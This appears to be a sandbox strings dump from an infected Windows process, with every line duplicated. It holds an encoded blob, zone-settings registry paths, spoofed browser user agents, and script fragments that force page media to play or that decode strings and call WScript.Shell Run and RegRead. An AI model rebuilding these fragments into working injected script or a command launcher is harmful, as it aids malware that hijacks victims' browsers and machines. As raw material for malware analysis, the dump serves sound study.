GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX2

GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX2

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

.Method '%s' not supported by automation object/Variant does not reference an automation object

.Method '%s' not supported by automation object/Variant does not reference an automation object

External exception %x

External exception %x

Interface not supported

Interface not supported

%s (%s, line %d)

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Invalid pointer operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction%Exception %s in module %s at %p.

Privileged instruction%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

Invalid variant operation"Variant method calls not supported

I/O error %d

I/O error %d

Integer overflow Invalid floating point operation

Integer overflow Invalid floating point operation

svchost.exe_932_rwx_00080000_000BC000:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Kernel32.dll

Kernel32.dll

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

